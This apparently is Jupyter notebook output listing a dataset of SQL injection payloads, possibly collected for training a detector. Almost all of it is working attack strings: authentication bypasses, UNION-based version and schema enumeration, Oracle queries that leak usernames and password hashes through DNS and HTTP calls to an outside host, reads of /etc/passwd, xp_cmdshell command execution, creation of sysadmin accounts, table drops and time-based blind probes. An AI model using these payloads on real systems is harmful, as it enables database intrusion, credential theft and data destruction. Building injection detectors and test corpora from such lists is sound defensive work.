1,version() -- 1   select * from users where id=1 or \\+<\\ union select 1,@@VERSION -- 1   select * from users where id=1 or \\+<$ union select 1,@@VERSION -- 1   select * from users where id=1 or 1&@#=1 union select 1,version() -- 1   select * from users where id=1 or $ .=1 union select 1,@@VERSION -- 1   select * from users where id=1 or $ 1=1 or 1=1 -- 1   select * from users where id=1 or $ 1=1 union select 1,@@VERSION -- 1   select * from users where id=1 or $<\\ or 1=1 -- 1   select * from users where id=1 or $<\\. or 1=1 -- 1   select * from users where id=1 or $<\\. union select 1,@@VERSION -- 1   select * from users where id=1 or $<\\ union select 1,@@VERSION -- 1   select * from users where id=1 or $+<\\ or 1=1 -- 1   select * from users where id=1 or $+<1 union select 1,@@VERSION -- 1   select * from users where id=1 or $+<\\ union select 1,@@VERSION -- 1   select * from users where id=1 or $+<$ union select 1,@@VERSION -- 1   select * from users where id=1 or \\<\\. or 1=1 -- 1   select * from users where id=1 or \\<\\. union select 1,@@VERSION -- 1   select * from users where id=1 or \\<1 or 1=1 -- 1   select * from users where id=1 or \\<1 union select 1,@@VERSION -- 1   select * from users where id=1 or \\<\\ union select 1,@@VERSION -- 1   select * from users where id=1 or \\<\\ union select null,@@VERSION -- 1   select * from users where id=1 or \\<$ or 1=1 -- 1   select * from users where id=1 or \\<$ union select 1,@@VERSION -- 1   select * from users where id=1 or \\< =1 or 1=1 -- 1   select * from users where id=1 or \\< =1 union select 1,@@VERSION -- 1   select * from users where id=1 or !<@ or 1=1 -- 1   select * from users where id=1 or !<@ union select 1,version() -- 1   select * from users where id=1 or @`\\` union select 1,version() -- 1   select * from users where id=1 or  @$#=1 union select 1,version() -- 1   select * from users where id=1 or @<@=1 union select 1,version() -- 1   select * from users where id=1 +(\\) or 1=1 -- 1   select * from users where id=1 +(\\) union select null,@@VERSION -- 1   select * from users where id=1.&&1 union select 1,version() -- 1   select * from users where id=1. or 1=1 -- 1   select * from users where id=1.&&@ union select 1,version() -- 1   select * from users where id=1 + (\\.) or 1=1 -- 1   select * from users where id=1 + (\\.) union select null,@@VERSION -- 1   select * from users where id=1.  union select 1,version() -- 1   select * from users where id=1. union select 1,banner from v$version where rownum=1 -- 1   select * from users where id=1.  union select version(),version() -- 1   select * from users where id=1. union select null,version() -- 1   select * from users where id=1 +\\. union select null,@@VERSION -- 1   select * from users where id=1. union select null,banner from v$version where rownum=1 -- 1   select * from users where id=1. <@ or 1=1 -- 1   select * from users where id=1.<@. or 1=1 -- 1   select * from users where id=1.<@. union select 1,version() -- 1   select * from users where id=1.*1 or 1=1 -- 1   select * from users where id=1.*1 union select 1,banner from v$version where rownum=1 -- 1   select * from users where id=1.<1# union select 1,version() -- 1   select * from users where id=1. <@ union select 1,version() -- 1   select * from users where id=1. <@ union select version(),version() -- 1   select * from users where id=1.*\\ union select null,@@VERSION -- 1   select * from users where id=1.<@$ or 1=1 -- 1   select * from users where id=1.<@$ union select 1,version() -- 1   select * from users where id=1.%@ or 1=1 -- 1   select * from users where id=1.%@ union select 1,version() -- 1   select * from users where id=11||1 union select 1,banner from v$version where rownum=1 -- 1   select * from users where id=1 +1 or 1=1 -- 1   select * from users where id=1 +(1) or 1=1 -- 1   select * from users where id=1 +(1) union select 1,banner from v$version where rownum=1 -- 1   select * from users where id=1 +(1) union select null,banner from v$version where rownum=1 -- 1   select * from users where id=1 +1 union select 1,banner from v$version where rownum=1 -- 1   select * from users where id=1 +1 union select null,banner from v$version where rownum=1 -- 1   select * from users where id=11<1# union select 1,version() -- 1   select * from users where id=1 + (\\+) or 1=1 -- 1   select * from users where id=1 + (\\+) union select null,@@VERSION -- 1   select * from users where id=1 +\\+. union select null,@@VERSION -- 1   select * from users where id=1 -1<@ union select 1,version() -- 1   select * from users where id=1 +1<@ union select version(),version() -- 1   select * from users where id=1 +1<@ union select null,version() -- 1   select * from users where id=1 + \\+%\\ or 1=1 -- 1   select * from users where id=1 + \\+%1 or 1=1 -- 1   select * from users where id=1 + \\+%1 union select null,@@VERSION -- 1   select * from users where id=1 + \\+*\\ union select null,@@VERSION -- 1   select * from users where id=1 + \\+%$ or 1=1 -- 1   select * from users where id=1 + \\+*$ union select null,@@VERSION -- 1   select * from users where id=1 union select (1),banner from v$version where rownum=1 -- 1   select * from users where id=1 union select 1||1,version() -- 1   select * from users where id=1 union select 1||@,version() -- 1   select * from users where id=1 union select 1 1$,version() -- 1   select * from users where id=1 union select 1 $,version() -- 1   select * from users where id=1 union select 1 1a,version() -- 1   select * from users where id=1 union select 1<@$,version() -- 1   select * from users where id=1 union select 1,banner from v$version where rownum=1 -- 1   select * from users where id=1 union select .1_,version() -- 1   select * from users where id=1 union select 1`\\`,version() -- 1   select * from users where id=1 union select 1a#,banner from v$version where rownum=1 -- 1   select * from users where id=1 union select 1a,banner from v$version where rownum=1 -- 1   select * from users where id=1 union select .1$_,version() -- 1   select * from users where id=1 union select 1<@,version() -- 1   select * from users where id=1 union select 1<@.,version() -- 1   select * from users where id=1 union select 1 $$,version() -- 1   select * from users where id=1 union select !<1,version() -- 1   select * from users where id=1 union select +!<1,version() -- 1   select * from users where id=1 union select +!<@,version() -- 1   select * from users 

In [37]:
all_sqli_sentence

['a\n',
 "a' \n",
 "a' --\n",
 "a' or 1=1; --\n",
 '@\n',
 '?\n',
 "' and 1=0) union all\n",
 '? or 1=1 --\n',
 "x' and userid is NULL; --\n",
 "x' and email is NULL; --\n",
 "anything' or 'x'='x\n",
 "x' and 1=(select count(*) from tabname); --\n",
 "x' and members.email is NULL; --\n",
 "x' or full_name like '%bob%\n",
 '23 or 1=1; --\n',
 "'; exec master..xp_cmdshell 'ping 172.10.1.255'--\n",
 'a\n',
 '1 or 1=1\n',
 "1' or '1'='1\n",
 "1 and user_name() = 'dbo'\n",
 '1\n',
 "1'1\n",
 '1 exec sp_ (or exec xp_)\n',
 '1 and 1=1\n',
 "1' and 1=(select count(*) from tablenames); --\n",
 '1\n',
 "1 and user_name() = 'dbo'\n",
 "\\'; desc users; --\n",
 "1\\'1\n",
 "1' and non_existant_table = '1\n",
 "' or username is not NULL or username = '\n",
 "1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116\n",
 "1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --\n",
 '1 uni/**/on select all from where\n',
 '’ or ‘1’=’1\n',
 "' or '1'='1\n",
 "'||utl_http.request('httP://192.168.1.1/')||'\n",
 "' || myappadmin.adduser('admin', 'newpass') || '\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i\n",
 "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i\n",
 "'||(elt(-3+5,bin(15),ord(10),hex(char(45))))\n",
 '||6\n',
 "'||'6\n",
 '(||6)\n',
 "' or 1=1-- \n",
 'or 1=1\n',
 "' or '1'='1\n",
 "; or '1'='1'\n",
 '" or isNULL(1/0) /*\n',
 "' or '7659'='7659\n",
 '" or isNULL(1/0) /*\n',
 "' -- \n",
 "' or 1=1--\n",
 '" or 1=1--\n',
 "' or 1=1 /*\n",
 'or 1=1--\n',
 "' or 'a'='a\n",
 '" or "a"="a\n',
 "') or ('a'='a\n",
 "admin' or '\n",
 "' select * from information_schema.tables--\n",
 ') union select * from information_schema.tables;\n',
 "' having 1=1--\n",
 "' having 1=1--\n",
 "' group by userid having 1=1--\n",
 "' select name from syscolumns where id = (select id from sysobjects where name = tablename')--\n",
 "' or 1 in (select @@version)--\n",
 "' union all select @@version--\n",
 "' or 'unusual' = 'unusual'\n",
 "' or 'something' = 'some'+'thing'\n",
 "' or 'text' = n'text'\n",
 "' or 'something' like 'some%'\n",
 "' or 2 > 1\n",
 "' or 'text' > 't'\n",
 "' or 'whatever' in ('whatever')\n",
 "' or 2 between 1 and 3\n",
 "' or username like char(37);\n",
 "' union select * from users where login = char(114,111,111,116);\n",
 "' union select \n",
 'password:*/=1--\n',
 'uni/**/on sel/**/ect\n',
 "'; execute immediate 'sel' || 'ect us' || 'er'\n",
 "'; exec ('sel' + 'ect us' + 'er')\n",
 "'/**/or/**/1/**/=/**/1\n",
 "' or 1/*\n",
 ' or isNULL(1/0) /*\n',
 "' or '7659'='7659\n",
 '" or isNULL(1/0) /*\n',
 "' -- &password=\n",
 "'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > \n",
 '@var select @var as var into temp end --\n',
 "' and 1 in (select var from temp)--\n",
 "' union select 1,load_file('/etc/passwd'),1,1,1;\n",
 '1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;\n',
 "' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));\n",
 "'; exec master..xp_cmdshell 'ping 10.10.1.2'--\n",
 "create user name identified by 'pass123'\n",
 'create user name identified by pass123 temporary tablespace temp default tablespace users; \n',
 "' ; drop table temp --\n",
 "exec sp_addlogin 'name' , 'password'\n",
 "exec sp_addsrvrolemember 'name' , 'sysadmin'\n",
 "insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123'))\n",
 'grant connect to name; grant resource to name;\n',
 'insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)\n',
 "' or 1=1 --\n",
 "' union (select @@version) --\n",
 "' union (select NULL, (select @@version)) --\n",
 "' union (select NULL, NULL, (select @@version)) --\n",
 "' union (select NULL, NULL, NULL,  (select @@version)) --\n",
 "' union (select NULL, NULL, NULL, NULL,  (select @@version)) --\n",
 "' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --\n",
 "'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --\n",
 "'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --\n",
 "'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --\n",
 "'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --\n",
 "'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --\n",
 "'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- \n",
 "'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --\n",
 "'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --",
 ' select * from users where id=1 or (\\)=1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or (\\.)=1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or (\\+)=1 or 1=1 -- 1\n',
 ' select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=1 or (\\+)=1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or ($+)=1 or 1=1 -- 1\n',
 ' select * from users where id=1 or ($+)=1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or \\.<\\ or 1=1 -- 1\n',
 ' select * from users where id=1 or \\.<1 or 1=1 -- 1\n',
 ' select * from users where id=1 or \\.<1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or \\.<\\ union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or \\.<$ or 1=1 -- 1\n',
 ' select * from users where id=1 or \\.<$ union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or \\.< =1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 ||1 union select 1,banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=1 ||1 union select null,banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=1   or 1=1 -- 1\n',
 ' select * from users where id=1 or \\+<\\ or 1=1 -- 1\n',
 ' select * from users where id=1 or  1<@=1 union select 1,version() -- 1\n',
 ' select * from users where id=1 or \\+<\\ union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or \\+<$ union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or 1&@#=1 union select 1,version() -- 1\n',
 ' select * from users where id=1 or $ .=1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or $ 1=1 or 1=1 -- 1\n',
 ' select * from users where id=1 or $ 1=1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or $<\\ or 1=1 -- 1\n',
 ' select * from users where id=1 or $<\\. or 1=1 -- 1\n',
 ' select * from users where id=1 or $<\\. union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or $<\\ union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or $+<\\ or 1=1 -- 1\n',
 ' select * from users where id=1 or $+<1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or $+<\\ union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or $+<$ union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or \\<\\. or 1=1 -- 1\n',
 ' select * from users where id=1 or \\<\\. union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or \\<1 or 1=1 -- 1\n',
 ' select * from users where id=1 or \\<1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or \\<\\ union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or \\<\\ union select null,@@VERSION -- 1\n',
 ' select * from users where id=1 or \\<$ or 1=1 -- 1\n',
 ' select * from users where id=1 or \\<$ union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or \\< =1 or 1=1 -- 1\n',
 ' select * from users where id=1 or \\< =1 union select 1,@@VERSION -- 1\n',
 ' select * from users where id=1 or !<@ or 1=1 -- 1\n',
 ' select * from users where id=1 or !<@ union select 1,version() -- 1\n',
 ' select * from users where id=1 or @`\\` union select 1,version() -- 1\n',
 ' select * from users where id=1 or  @$#=1 union select 1,version() -- 1\n',
 ' select * from users where id=1 or @<@=1 union select 1,version() -- 1\n',
 ' select * from users where id=1 +(\\) or 1=1 -- 1\n',
 ' select * from users where id=1 +(\\) union select null,@@VERSION -- 1\n',
 ' select * from users where id=1.&&1 union select 1,version() -- 1\n',
 ' select * from users where id=1. or 1=1 -- 1\n',
 ' select * from users where id=1.&&@ union select 1,version() -- 1\n',
 ' select * from users where id=1 + (\\.) or 1=1 -- 1\n',
 ' select * from users where id=1 + (\\.) union select null,@@VERSION -- 1\n',
 ' select * from users where id=1.  union select 1,version() -- 1\n',
 ' select * from users where id=1. union select 1,banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=1.  union select version(),version() -- 1\n',
 ' select * from users where id=1. union select null,version() -- 1\n',
 ' select * from users where id=1 +\\. union select null,@@VERSION -- 1\n',
 ' select * from users where id=1. union select null,banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=1. <@ or 1=1 -- 1\n',
 ' select * from users where id=1.<@. or 1=1 -- 1\n',
 ' select * from users where id=1.<@. union select 1,version() -- 1\n',
 ' select * from users where id=1.*1 or 1=1 -- 1\n',
 ' select * from users where id=1.*1 union select 1,banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=1.<1# union select 1,version() -- 1\n',
 ' select * from users where id=1. <@ union select 1,version() -- 1\n',
 ' select * from users where id=1. <@ union select version(),version() -- 1\n',
 ' select * from users where id=1.*\\ union select null,@@VERSION -- 1\n',
 ' select * from users where id=1.<@$ or 1=1 -- 1\n',
 ' select * from users where id=1.<@$ union select 1,version() -- 1\n',
 ' select * from users where id=1.%@ or 1=1 -- 1\n',
 ' select * from users where id=1.%@ union select 1,version() -- 1\n',
 ' select * from users where id=11||1 union select 1,banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=1 +1 or 1=1 -- 1\n',
 ' select * from users where id=1 +(1) or 1=1 -- 1\n',
 ' select * from users where id=1 +(1) union select 1,banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=1 +(1) union select null,banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=1 +1 union select 1,banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=1 +1 union select null,banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=11<1# union select 1,version() -- 1\n',
 ' select * from users where id=1 + (\\+) or 1=1 -- 1\n',
 ' select * from users where id=1 + (\\+) union select null,@@VERSION -- 1\n',
 ' select * from users where id=1 +\\+. union select null,@@VERSION -- 1\n',
 ' select * from users where id=1 -1<@ union select 1,version() -- 1\n',
 ' select * from users where id=1 +1<@ union select version(),version() -- 1\n',
 ' select * from users where id=1 +1<@ union select null,version() -- 1\n',
 ' select * from users where id=1 + \\+%\\ or 1=1 -- 1\n',
 ' select * from users where id=1 + \\+%1 or 1=1 -- 1\n',
 ' select * from users where id=1 + \\+%1 union select null,@@VERSION -- 1\n',
 ' select * from users where id=1 + \\+*\\ union select null,@@VERSION -- 1\n',
 ' select * from users where id=1 + \\+%$ or 1=1 -- 1\n',
 ' select * from users where id=1 + \\+*$ union select null,@@VERSION -- 1\n',
 ' select * from users where id=1 union select (1),banner from v$version where rownum=1 -- 1\n',
 ' select * from users where id=1 union select 1||1,version() -- 1\n',
 ' select * from users where id=1 union select 1||@,version() -- 1\n',
 ' select * from users where id=1 union select 1 1$,version() -- 1\n',
 ' select * from users where id=1 union select 1 $,version() -- 1\n',
 ' select * from users where id=1 union select 1 1a,version() -- 1\n',